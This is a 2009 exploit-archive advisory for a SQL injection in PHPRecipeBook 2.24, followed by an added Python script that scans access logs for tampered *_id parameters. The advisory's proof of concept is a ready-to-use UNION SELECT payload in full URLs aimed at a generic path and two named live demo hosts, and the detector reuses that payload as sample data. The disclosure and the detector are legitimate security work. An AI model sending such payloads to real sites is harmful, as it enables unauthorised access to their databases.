[+] PHPRecipeBook 2.24 (_id) Remote SQL Injection Vulnerability
[-]
[+] Discovered By d3b4g
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
[+] Greetz : str0ke | Inerd | & friends
[-] Follow me on twitter www.twitter.com/schaba

About:
------>
PHPRecipeBook is a Web-based cookbook with the
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited.
The shopping list also attempts to combine similar items
so that duplication does not occur.

/* start

0x1

Proof of concept
-------------------------------------

Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

/* end

-------------------------------------
From Tiny Little island of Maldives
-------------------------------------

# milw0rm.com [2009-03-09]
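
Added example, not part of the original advisory: a log check that flags recipes-search requests whose *_id parameter (base_id and course_id in the proof of concept above) is not a plain integer. It assumes a common/combined format access log; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The advisory title names the "_id" suffix and its PoC uses base_id and
# course_id, so every parameter ending in _id is checked.
ID_PARAM = re.compile(r"^[a-z_]*_id$")
# Request line of a common/combined access-log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_id_params(url):
    """Return {param: decoded value} for *_id parameters of a recipes
    search request whose value is not a plain non-negative integer."""
    query = parse_qs(urlsplit(url).query)
    if query.get("m") != ["recipes"] or query.get("a") != ["search"]:
        return {}
    hits = {}
    for name, values in query.items():
        if ID_PARAM.match(name):
            for value in values:
                if value and not (value.isascii() and value.isdigit()):
                    hits[name] = value
    return hits

def scan(log_lines):
    """Yield (line_number, hits) for each log line carrying a tampered id."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_id_params(match.group(1))
            if hits:
                yield number, hits

# Parameter value copied from the advisory's proof of concept.
PAGE_PAYLOAD = "5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--"
# Constructed sample log lines (documentation addresses, not real traffic).
PREFIX = '"GET /phprecipebook/index.php?m=recipes&a='
SAMPLE_LOG = [
    f'192.0.2.10 - - [09/Mar/2009:10:00:01 +0000] {PREFIX}search&search=yes&base_id=5 HTTP/1.1" 200 5120',
    f'192.0.2.66 - - [09/Mar/2009:10:00:07 +0000] {PREFIX}search&search=yes&base_id={PAGE_PAYLOAD} HTTP/1.1" 200 4980',
    f'192.0.2.66 - - [09/Mar/2009:10:00:09 +0000] {PREFIX}search&search=yes&course_id={PAGE_PAYLOAD.replace("+", "%20")} HTTP/1.1" 200 4980',
    f'192.0.2.10 - - [09/Mar/2009:10:00:12 +0000] {PREFIX}view&recipe_id=abc HTTP/1.1" 200 830',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

The check compares the URL-decoded value, so the "+" and "%20" encodings of the same string are both caught; the last sample line is ignored because it is not a search request.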